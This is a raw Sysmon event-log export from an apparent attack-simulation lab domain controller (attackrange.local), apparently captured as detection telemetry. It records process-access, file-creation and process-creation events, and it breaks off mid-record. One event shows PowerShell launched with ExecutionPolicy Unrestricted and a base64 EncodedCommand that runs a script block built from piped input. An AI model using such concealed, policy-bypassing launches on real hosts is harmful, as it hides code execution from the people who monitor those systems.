10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.247{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.169{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.169{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.169{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.169{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.169{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7C3D-5FA1-FC02-000000008701}47202492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF83B07BAAF) 154100x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.168{D28789B6-7C3E-5FA1-FE02-000000008701}3360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ypm0fu2n.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.154{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ypm0fu2n.cmdline2020-11-03 15:50:22.154 11241100x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:22.154{D28789B6-7C3D-5FA1-FC02-000000008701}4720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ypm0fu2n.dll2020-11-03 15:50:22.154 11241100x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:23.716{D28789B6-7C3F-5FA1-0603-000000008701}5000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\01fhxppq.dll2020-11-03 15:50:23.607 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3F-5FA1-0703-000000008701}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:23.701{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3F-5FA1-0703-000000008701}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 